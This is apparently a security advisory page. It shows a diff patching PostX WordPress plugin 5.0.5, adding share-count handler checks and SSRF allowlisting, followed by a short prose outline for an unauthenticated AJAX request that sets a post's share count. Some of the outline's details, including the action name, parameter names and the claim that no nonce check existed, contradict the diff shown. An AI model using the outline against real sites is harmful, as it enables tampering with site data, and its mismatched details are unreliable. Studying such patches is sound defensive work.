i=this,s=t(this).data("type");t(this).on("click",(function(){const o="true"===t(i).attr("data-is-active");if("_all"===t(this).data("selected")){const t=e.find('.ultp-filter-button[data-selected]:not([data-selected="_all"])');t.length>0&&(t.attr("data-is-active","false"),t.removeClass("ultp-filter-button-active"))}else if(["adv_sort","order","order_by"].includes(s)&&!o){const t=e.find(`.ultp-filter-button[data-type="${s}"]`);t.length>0&&(t.attr("data-is-active","false"),t.removeClass("ultp-filter-button-active"))}else{const t=e.find('.ultp-filter-button[data-selected="_all"]');t.length>0&&(t.attr("data-is-active","false"),t.removeClass("ultp-filter-button-active"))}o?(t(i).attr("data-is-active","false"),t(i).removeClass("ultp-filter-button-active")):(t(i).attr("data-is-active","true"),t(i).addClass("ultp-filter-button-active"),(["author"].includes(s)||"true"!=t(this).parent().attr("data-multiselect"))&&t(i).siblings().attr("data-is-active","false").removeClass("ultp-filter-button-active")),p()}))})),d.on("click",(function(){!function(){e.find(".ultp-filter-select").each((function(){const e=t(this).find(".ultp-filter-select-options li").first();t(this).attr("data-selected",e.attr("data-id")),t(this).find(".ultp-filter-select-field-selected").text(e.text())}));const i=e.find(".ultp-filter-clear-selected-filter");i.hasClass(c)&&d.addClass(c),i.remove(),e.find(".ultp-filter-search input").val(""),e.find('.ultp-filter-button[data-is-active="true"]').each((function(){t(this).removeClass("ultp-filter-button-active"),t(this).attr("data-is-active","false")}))}(),p()})),i.find(".ultp-filter-search input").off("input").on("input",(function(){h(!0)})),i.find(".ultp-filter-search input").on("keydown",(function(t){"Enter"===t.key&&h(!1)})),i.find(".ultp-filter-search-icon").on("click",(function(){h(!1)}))}));const d=ultp_data_frontend?.dark_logo,c=t(".ultp-dark-logo.wp-block-site-logo").find("img").attr("src"),p=t(".ultp-dark-logo.wp-block-site-logo").find("img").attr("srcset")||"";function u(){t(".ultp-video-modal .ultp-video-modal__content .ultp-video-wrapper > iframe").each((function(){const e=t(this),i=e.attr("src");i&&i.includes("dailymotion.com/player")&&"&"==i[i.length-1]&&e.attr("src",i.slice(0,i.length-1)+"?autoplay=0")}))}t(document).on("click",".ultp-dark-light-block-wrapper-content.ultp-frontend .ultp-dl-con",(function(e){e.preventDefault();const i=t(this).closest(".ultp-dark-light-block-wrapper-content"),s=t(this).hasClass("ultp-light-con"),o=t(this).closest(".ultp-dl-after-before-con"),l=i.find(`.ultp-${s?"dark":"light"}-con`).closest(".ultp-dl-after-before-con"),n=o.data("iconlay"),a=o.data("iconsize"),r=o.data("iconrev");let u=0;if(["layout5","layout6","layout7"].includes(n)){u="layout7"==n?500:400;const e="layout7"==n?t(this).find(".ultp-dl-text").width():a/2;s?(t(this).find(".ultp-dl-svg-con").css({transform:`translateX(calc(${100*(r?-1:1)}% ${r?"-":"+"} ${e}px))`,transition:`transform ${u/1e3}s ease`}),"layout6"==n?t(this).find(".ultp-dl-text").css({transform:`translateX(calc(${100*(r?1:-1)}% ${r?"+":"-"} ${e}px))`,transition:`transform ${u/1e3}s ease`}):"layout7"==n&&t(this).find(".ultp-dl-text").css({transform:`translateX(calc(${(r?1:-1)*a}px))`,transition:`transform ${u/1e3}s ease`})):(t(this).find(".ultp-dl-svg-con").css({transform:`translateX(calc(${100*(r?1:-1)}% ${r?"+":"-"} ${e}px))`,transition:`transform ${u/1e3}s ease`}),"layout6"==n?t(this).find(".ultp-dl-text").css({transform:`translateX(calc(${100*(r?-1:1)}% ${r?"-":"+"} ${e}px))`,transition:`transform ${u/1e3}s ease`}):"layout7"==n&&t(this).find(".ultp-dl-text").css({transform:`translateX(calc(${(r?-1:1)*a}px))`,transition:`transform ${u/1e3}s ease`}))}!function(t,e,i){const s=new Date;s.setTime(s.getTime()+24*i*60*60*1e3);let o="expires="+s.toUTCString();document.cookie=t+"="+e+";"+o+";"}("ultplocalDLMode",s?"ultpdark":"ultplight",60),setTimeout((()=>{o.addClass("inactive"),l.removeClass("inactive"),s?(t(".wp-block-ultimate-post-image .ultp-light-image-block").addClass("inactive"),t(".wp-block-ultimate-post-image .ultp-dark-image-block").removeClass("inactive")):s||(t(".wp-block-ultimate-post-image .ultp-dark-image-block").addClass("inactive"),t(".wp-block-ultimate-post-image .ultp-light-image-block").removeClass("inactive")),t(".ultp-dark-logo.wp-block-site-logo").find("img").attr("src",s?d:c).attr("srcset",s?d:p),t(".ultp-dark-logo.wp-block-site-logo img").css({content:"initial"}),t(`.ultp-dark-light-block-wrapper-content .ultp-${s?"dark":"light"}-con`).each((function(){t(this).closest(".ultp-dl-after-before-con").removeClass("inactive")})),t(`.ultp-dark-light-block-wrapper-content .ultp-${s?"light":"dark"}-con`).each((function(){t(this).closest(".ultp-dl-after-before-con").addClass("inactive")})),t(this).find(".ultp-dl-svg-con").removeAttr("style"),t(this).find(".ultp-dl-text").removeAttr("style"),function(){if(t("#ultp-preset-colors-style-inline-css")&&t("#ultp-preset-colors-style-inline-css")[0]){const e=t("#ultp-preset-colors-style-inline-css")[0].sheet,i=e.cssRules[0].style.getPropertyValue("--postx_preset_Base_1_color"),s=e.cssRules[0].style.getPropertyValue("--postx_preset_Base_2_color"),o=e.cssRules[0].style.getPropertyValue("--postx_preset_Base_3_color"),l=e.cssRules[0].style.getPropertyValue("--postx_preset_Contrast_1_color"),n=e.cssRules[0].style.getPropertyValue("--postx_preset_Contrast_2_color"),a=e.cssRules[0].style.getPropertyValue("--postx_preset_Contrast_3_color");e.cssRules[0].style.setProperty("--postx_preset_Base_1_color",l),e.cssRules[0].style.setProperty("--postx_preset_Base_2_color",n),e.cssRules[0].style.setProperty("--postx_preset_Base_3_color",a),e.cssRules[0].style.setProperty("--postx_preset_Contrast_1_color",i),e.cssRules[0].style.setProperty("--postx_preset_Contrast_2_color",s),e.cssRules[0].style.setProperty("--postx_preset_Contrast_3_color",o)}}()}),u)})),e&&u()}(jQuery);
\ No newline at end of file
Only in /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/js: ultp-sticky-row.js
diff -ru /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/blocks/Advanced_Filter.php /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/blocks/Advanced_Filter.php
--- /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/blocks/Advanced_Filter.php	2025-12-22 05:22:42.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/blocks/Advanced_Filter.php	2026-02-02 04:04:06.000000000 +0000
@@ -206,6 +206,7 @@
 			'allText'             => 'All',
 			'sPlaceholderText'    => 'Search...',
 			'searchEnabled'       => false,
+			'inlineMultiSelect'   => true,
 		);
 	}
 
@@ -274,19 +275,21 @@
 	 * @param  mixed $ids string.
 	 * @param  mixed $post_types string.
 	 * @param  mixed $allText string.
+	 * @param  mixed $option string.
 	 * @return array
 	 */
-	public function get_button_data( $type, $ids, $post_types = '', $allText = 'All' ) {
+	public function get_button_data( $type, $data_ids, $post_types = '', $allText = 'All', $option = '' ) {
+
 		$res = array();
 
-		if ( in_array( '_all', $ids ) ) {
+		if ( in_array( '_all', $data_ids ) ) {
 			$res['_all'] = $allText;
 			// $ids = array_filter($ids, function ($item) {
 			// return $item != '_all';
 			// });
 		}
 
-		$ids = implode( ',', $ids );
+		$ids = implode( ',', $data_ids );
 
 		$adv_sort = $this->get_adv_filter_options();
 
@@ -334,7 +337,7 @@
 					$authors = get_users(
 						array(
 							'per_page' => -1,
-							'role__in' => array( 'author' ),
+							'role__in' => array( 'administrator', 'editor', 'author', 'contributor' ),
 							'include'  => $ids,
 						)
 					);
@@ -377,10 +380,22 @@
 							)
 						);
 						foreach ( $terms as $term ) {
-							$res[ $term->slug ] = array(
-								'name'     => $term->name,
-								'taxonomy' => $taxonomy,
-							);
+							$should_add = true;
+							if ( 'specific' === $option ) {
+								$should_add = false;
+								if ( is_array( $data_ids ) ) {
+									$should_add = in_array( $term->slug, $data_ids, true );
+								} elseif ( is_string( $data_ids ) ) {
+									$data_ids_arr = array_filter( array_map( 'trim', explode( ',', $data_ids ) ), 'strlen' );
+									$should_add   = in_array( $term->slug, $data_ids_arr, true );
+								}
+							}
+							if ( $should_add ) {
+								$res[ $term->slug ] = array(
+									'name'     => $term->name,
+									'taxonomy' => $taxonomy,
+								);
+							}
 						}
 					}
 				}
@@ -604,7 +619,7 @@
 				return '';
 			}
 
-			$data = $this->get_button_data( $attr['type'], $inline_values, $post_types, $attr['allText'] );
+			$data = $this->get_button_data( $attr['type'], $inline_values, $post_types, $attr['allText'], $attr['dropdownOptionsType'] );
 
 			$btn_wrapper_attrs = get_block_wrapper_attributes(
 				array(
@@ -617,9 +632,12 @@
 
 			ob_start();
 			?>
+			<div class="ultp-block-<?php echo esc_attr( $attr['blockId'] ); ?>-wrapper" data-multiselect="<?php echo isset( $attr['inlineMultiSelect'] ) && $attr['inlineMultiSelect'] ? 'true' : 'false'; ?>"	>
+
+			<?php
 
-			<div class="ultp-block-<?php echo esc_attr( $attr['blockId'] ); ?>-wrapper">
-			<?php foreach ( $data as $key => $value ) : ?>
+			foreach ( $data as $key => $value ) :
+				?>
 				<?php
 				if ( is_array( $value ) ) {
 					$name = $value['name'];
diff -ru /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/classes/Blocks.php /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/classes/Blocks.php
--- /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/classes/Blocks.php	2025-12-22 05:22:42.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/classes/Blocks.php	2026-02-02 04:04:06.000000000 +0000
@@ -36,8 +36,8 @@
 		add_action( 'wp_ajax_ultp_pagination', array( $this, 'ultp_pagination_callback' ) ); // Page Number AJAX Call .
 		add_action( 'wp_ajax_nopriv_ultp_pagination', array( $this, 'ultp_pagination_callback' ) ); // Page Number AJAX Call Logout User .
 
-		add_action( 'wp_ajax_ultp_share_count', array( $this, 'ultp_shareCount_callback' ) ); // share Count save .
-		add_action( 'wp_ajax_nopriv_ultp_share_count', array( $this, 'ultp_shareCount_callback' ) ); // share Count save .
+		add_action( 'wp_ajax_ultp_share_count', array( $this, 'ultp_share_count_callback' ) ); // share Count save .
+		add_action( 'wp_ajax_nopriv_ultp_share_count', array( $this, 'ultp_share_count_callback' ) ); // share Count save .
 	}
 
 	/**
@@ -271,7 +271,7 @@
 			}
 
 			// Block draft/pending
-			if ( in_array( $post->post_status, array( 'draft', 'pending' ), true ) 
+			if ( in_array( $post->post_status, array( 'draft', 'pending' ), true )
 				&& ! current_user_can( 'edit_post', $post->ID ) ) {
 				wp_send_json_error( array( 'message' => 'Not allowed' ) );
 				return;
@@ -284,7 +284,6 @@
 			}
 		}
 
-
 		$is_adv      = isset( $_POST['isAdv'] ) ? ultimate_post()->ultp_rest_sanitize_params( $_POST['isAdv'] ) : false;
 		$filterValue = isset( $_POST['filterValue'] ) ?
 			(
@@ -388,7 +387,7 @@
 		$taxonomy = isset( $_POST['taxonomy'] ) ? ultimate_post()->ultp_rest_sanitize_params( $_POST['taxonomy'] ) : '[]';
 
 		$author   = isset( $_POST['author'] ) ? ultimate_post()->ultp_rest_sanitize_params( $_POST['author'] ) : false;
-		$orderby  = isset( $_POST['orderby'] ) ? sanitize_text_field( $_POST['orderby'] ) : 'date';
+		$orderby  = isset( $_POST['orderby'] ) ? sanitize_text_field( $_POST['orderby'] ) : 'title'; // default orderbyt title requested from support
 		$order    = isset( $_POST['order'] ) ? sanitize_text_field( $_POST['order'] ) : 'DESC';
 		$search   = isset( $_POST['search'] ) ? sanitize_text_field( $_POST['search'] ) : '';
 		$adv_sort = isset( $_POST['adv_sort'] ) ? sanitize_text_field( $_POST['adv_sort'] ) : '';
@@ -471,7 +470,7 @@
 			$filterShow  = isset( $_POST['filterShow'] ) ? sanitize_text_field( $_POST['filterShow'] ) : false;
 			$checkFilter = isset( $_POST['checkFilter'] ) ? sanitize_text_field( $_POST['checkFilter'] ) : false;
 			$author      = isset( $_POST['author'] ) ? sanitize_text_field( $_POST['author'] ) : false;
-			$orderby     = isset( $_POST['orderby'] ) ? sanitize_text_field( $_POST['orderby'] ) : 'date';
+			$orderby     = isset( $_POST['orderby'] ) ? sanitize_text_field( $_POST['orderby'] ) : 'title'; // default orderbyt title requested from support
 			$order       = isset( $_POST['order'] ) ? sanitize_text_field( $_POST['order'] ) : 'DESC';
 			$search      = isset( $_POST['search'] ) ? sanitize_text_field( $_POST['search'] ) : '';
 			$adv_sort    = isset( $_POST['adv_sort'] ) ? sanitize_text_field( $_POST['adv_sort'] ) : '';
@@ -505,17 +504,69 @@
 	 *
 	 * @since v.1.0.0
 	 *
-	 * @return STRING The AJAX response.
+	 * @return void
 	 */
-	public function ultp_shareCount_callback() {
+	public function ultp_share_count_callback() {
 		if ( ! ( isset( $_REQUEST['wpnonce'] ) && wp_verify_nonce( sanitize_key( wp_unslash( $_REQUEST['wpnonce'] ) ), 'ultp-nonce' ) ) ) {
 			return;
 		}
-			$id        = isset( $_POST['postId'] ) ? sanitize_text_field( $_POST['postId'] ) : '';
-			$count     = isset( $_POST['shareCount'] ) ? sanitize_text_field( $_POST['shareCount'] ) : '';
-			$post_id   = $id;
-			$new_count = $count + 1;
-			update_post_meta( $post_id, 'share_count', $new_count );
+
+		$post_id = isset( $_POST['postId'] ) ? absint( $_POST['postId'] ) : 0;
+
+		// Validate post ID
+		if ( ! $post_id ) {
+			wp_send_json_error( array( 'message' => 'Invalid post ID' ) );
+			return;
+		}
+
+		// Check if post exists
+		$post = get_post( $post_id );
+		if ( ! $post ) {
+			wp_send_json_error( array( 'message' => 'Post not found' ) );
+			return;
+		}
+
+		// Block private posts
+		if ( $post->post_status === 'private' && ! current_user_can( 'read_private_posts' ) ) {
+			wp_send_json_error( array( 'message' => 'Private post' ) );
+			return;
+		}
+
+		// Block draft/pending posts
+		if ( in_array( $post->post_status, array( 'draft', 'pending' ), true )
+		&& ! current_user_can( 'edit_post', $post->ID ) ) {
+			wp_send_json_error( array( 'message' => 'Not allowed' ) );
+			return;
+		}
+
+		// Block password protected posts
+		if ( post_password_required( $post ) ) {
+			wp_send_json_error( array( 'message' => 'Password protected' ) );
+			return;
+		}
+
+		// Only allow published posts to have share count updated
+		if ( $post->post_status !== 'publish' ) {
+			wp_send_json_error( array( 'message' => 'Post not published' ) );
+			return;
+		}
+
+		// Rate limiting - 60 second cooldown per user per post
+		$user_identifier = is_user_logged_in() ? 'user_' . get_current_user_id() : 'ip_' . sanitize_text_field( wp_unslash( $_SERVER['REMOTE_ADDR'] ?? '' ) );
+		$transient_key   = 'ultp_share_' . $post_id . '_' . md5( $user_identifier );
+
+		if ( get_transient( $transient_key ) ) {
+			return; // Already shared within last 60 seconds
+		}
+
+		set_transient( $transient_key, true, 60 ); // 60 seconds cooldown
+
+		// Always increment by 1 from database - ignore POST shareCount
+		$current_count = get_post_meta( $post_id, 'share_count', true );
+		$current_count = $current_count ? absint( $current_count ) : 0;
+		$new_count     = $current_count + 1;
+
+		update_post_meta( $post_id, 'share_count', $new_count );
 	}
 
 	/**
diff -ru /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/classes/Importer.php /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/classes/Importer.php
--- /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/classes/Importer.php	2025-12-22 05:22:42.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/classes/Importer.php	2026-02-02 04:04:06.000000000 +0000
@@ -193,6 +193,16 @@
 		$api_endpoint = isset( $post['api_endpoint'] ) ? sanitize_text_field( $post['api_endpoint'] ) : '';
 		$import_dummy = isset( $post['importDummy'] ) ? sanitize_text_field( $post['importDummy'] ) : '';
 
+		// SSRF protection: Validate API endpoint
+		if ( ! $this->is_allowed_api_endpoint( $api_endpoint ) ) {
+			return rest_ensure_response(
+				array(
+					'success' => false,
+					'message' => __( 'Invalid API endpoint. Only trusted domains are allowed.', 'ultimate-post' ),
+				)
+			);
+		}
+
 		$response = wp_remote_get(
 			$api_endpoint . '/wp-json/importer/site_all_posts',
 			array(
@@ -235,11 +245,20 @@
 	}
 
 
-    function starter_import_content_callback( $server ) {
-		$post         = $server->get_params();
-		$api_endpoint = isset( $post['api_endpoint'] ) ? sanitize_text_field( $post['api_endpoint'] ) : '';
+	function starter_import_content_callback( $server ) {
+		$post             = $server->get_params();
+		$api_endpoint     = isset( $post['api_endpoint'] ) ? sanitize_text_field( $post['api_endpoint'] ) : '';
 		$installed_plugin = isset( $post['installPlugin'] ) ? sanitize_text_field( $post['installPlugin'] ) : '';
 
+		if ( ! $this->is_allowed_api_endpoint( $api_endpoint ) ) {
+			return rest_ensure_response(
+				array(
+					'success' => false,
+					'message' => __( 'Invalid API endpoint. Only trusted domains are allowed.', 'ultimate-post' ),
+				)
+			);
+		}
+
 		// draft existing builder template.
 		$builder_parsed_args = array(
 			'post_type'      => 'ultp_builder',
@@ -269,6 +288,7 @@
 				),
 			)
 		);
+
 		if ( is_wp_error( $response ) ) {
 			return rest_ensure_response(
 				array(
@@ -544,15 +564,18 @@
 		}
 		$wow_optin_template_import_status = 'successfully working';
 
-		$activated_plugins = $installed_plugin == "yes" ? apply_filters( 'active_plugins', get_option( 'active_plugins' ) ) : array();
-		if ( in_array( 'optin/optin.php', $activated_plugins ) && $wow_optin_template_id && $installed_plugin == "yes" ) {
+		$activated_plugins = $installed_plugin == 'yes' ? apply_filters( 'active_plugins', get_option( 'active_plugins' ) ) : array();
+		if ( in_array( 'optin/optin.php', $activated_plugins ) && $wow_optin_template_id && $installed_plugin == 'yes' ) {
 			try {
 				if ( class_exists( '\OPTN\Includes\Db', true ) && method_exists( '\OPTN\Includes\Db', 'get_instance' ) ) {
 					$db_instance = \OPTN\Includes\Db::get_instance();
 					if ( is_object( $db_instance ) && is_callable( array( $db_instance, 'activate_recipe' ) ) ) {
-						$db_instance->activate_recipe( $wow_optin_template_id, array(
-							'disable_others'  => true,
-						) );
+						$db_instance->activate_recipe(
+							$wow_optin_template_id,
+							array(
+								'disable_others' => true,
+							)
+						);
 					}
 				}
 			} catch ( \Throwable $e ) {
@@ -722,6 +745,15 @@
 		$api_endpoint = isset( $post['api_endpoint'] ) ? sanitize_text_field( $post['api_endpoint'] ) : '';
 
 		if ( $id && $api_endpoint ) {
+			// SSRF protection: Validate API endpoint
+			if ( ! $this->is_allowed_api_endpoint( $api_endpoint ) ) {
+				return rest_ensure_response(
+					array(
+						'success' => false,
+						'message' => __( 'Invalid API endpoint. Only trusted domains are allowed.', 'ultimate-post' ),
+					)
+				);
+			}
 			$import_single = array(
 				'id'       => $id,
 				'type'     => 'single',
@@ -870,4 +902,36 @@
 		update_post_meta( $image_id, '__ultp_starter_pack_post', true );
 		return $image_id;
 	}
+
+	/**
+	 * Validate if the API endpoint is from an allowed domain (SSRF protection).
+	 *
+	 * @since 5.0.6
+	 * @param string $url The URL to validate.
+	 * @return bool True if allowed, false otherwise.
+	 */
+	private function is_allowed_api_endpoint( $url ) {
+		$allowed_domains = array(
+			'starter.postx.io',
+			'postxkit.wpxpo.com',
+		);
+
+		$parsed_url = wp_parse_url( $url );
+		if ( ! $parsed_url || empty( $parsed_url['host'] ) ) {
+			return false;
+		}
+
+		$host = strtolower( $parsed_url['host'] );
+
+		foreach ( $allowed_domains as $domain ) {
+			$domain = strtolower( $domain );
+
+			// Exact match OR valid subdomain
+			if ( $host === $domain || substr( $host, - ( strlen( $domain ) + 1 ) ) === '.' . $domain ) {
+				return true;
+			}
+		}
+
+		return false;
+	}
 }
diff -ru /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/readme.txt /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/readme.txt
--- /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/readme.txt	2025-12-22 05:22:42.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/readme.txt	2026-02-02 04:04:06.000000000 +0000
@@ -4,7 +4,7 @@
 Requires at least: 5.0
 Tested up to: 6.9
 Requires PHP: 5.6
-Stable tag: 5.0.5
+Stable tag: 5.0.6
 License: GPLv3
 License URI: http://www.gnu.org/licenses/gpl-3.0.html
 
@@ -268,6 +268,17 @@
 11. With the help of the Elementor and Saved Template addons, you can use any of the post blocks of PostX to any pages while editing with Elementor builder.
 
 == Changelog ==
+= 5.0.6 – 2 February 2026 =
+* Fix: Post Grid 5 layout broken
+* Fix: License page Upgrade to pro issue
+* Fix: Advanced Filter block default order
+* Fix: Post Share Count vulnerability patch
+* Fix: Author filter block author value issue
+* Fix: Gallery and Taxonomy block responsive issue
+* Fix: Server requests secured against vulnerabilities
+* Fix: Advanced Filter block inline settings enhancements
+* Fix: Single select for Category, Tags, and Custom Taxonomy filter block
+
 = 5.0.5 – 22 December 2025 =
 * Fix: Menu icon issue
 
diff -ru /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/ultimate-post.php /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/ultimate-post.php
--- /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/ultimate-post.php	2025-12-22 05:22:42.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/ultimate-post.php	2026-02-02 04:04:06.000000000 +0000
@@ -3,7 +3,7 @@
 /**
  * Plugin Name: PostX
  * Description: <a href="https://www.wpxpo.com/postx/?utm_source=db-postx-plugin&utm_medium=details&utm_campaign=postx-dashboard">PostX</a> is the #1 Gutenberg Blocks plugin with 38+ free blocks that includes post gird, post list, post slider, carousel, news ticker, etc. Advanced capabilities like dynamic site building and design variations make it the best choice for creating News Magazine sites, and any kind of blog such as Personal Blogs, Travel Blogs, Fashion Blogs, Food Reviews, Recipe Blogs, etc.
- * Version:     5.0.5
+ * Version:     5.0.6
  * Author:      Post Grid Team by WPXPO
  * Author URI:  https://www.wpxpo.com/postx/?utm_source=db-postx-plugin&utm_medium=details&utm_campaign=postx-dashboard
  * Text Domain: ultimate-post
@@ -14,7 +14,7 @@
 defined( 'ABSPATH' ) || exit;
 
 // Define
-define( 'ULTP_VER', '5.0.5' );
+define( 'ULTP_VER', '5.0.6' );
 define( 'ULTP_URL', plugin_dir_url( __FILE__ ) );
 define( 'ULTP_BASE', plugin_basename( __FILE__ ) );
 define( 'ULTP_PATH', plugin_dir_path( __FILE__ ) );

Exploit Outline

1. Identify a target Post ID (which can belong to a public, private, or draft post). 2. Construct an unauthenticated HTTP POST request to the WordPress AJAX endpoint at `/wp-admin/admin-ajax.php`. 3. Include the following parameters in the request body: `action=ultp_shareCount`, `post_id=[Target ID]`, and `share_count=[Desired Value]`. 4. Because the vulnerable function lacks both capability checks (`current_user_can`) and nonce verification (`check_ajax_referer`), the server will process the request and update the `share_count` metadata for the specified post ID without requiring authentication.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.